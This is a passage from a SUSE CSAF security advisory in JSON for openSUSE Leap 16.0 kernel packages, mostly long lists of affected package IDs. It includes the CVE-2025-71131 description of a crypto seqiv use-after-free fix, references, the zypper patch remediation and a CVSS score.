"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71130"
},
{
"cve": "CVE-2025-71131",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71131"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: seqiv - Do not use req-\u003eiv after crypto_aead_encrypt\n\nAs soon as crypto_aead_encrypt is called, the underlying request\nmay be freed by an asynchronous completion. Thus dereferencing\nreq-\u003eiv after it returns is invalid.\n\nInstead of checking req-\u003eiv against info, create a new variable\nunaligned_info and use it for that purpose instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71131",
"url": "https://www.suse.com/security/cve/CVE-2025-71131"
},
{
"category": "external",
"summary": "SUSE Bug 1256742 for CVE-2025-71131",
"url": "https://bugzilla.suse.com/1256742"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
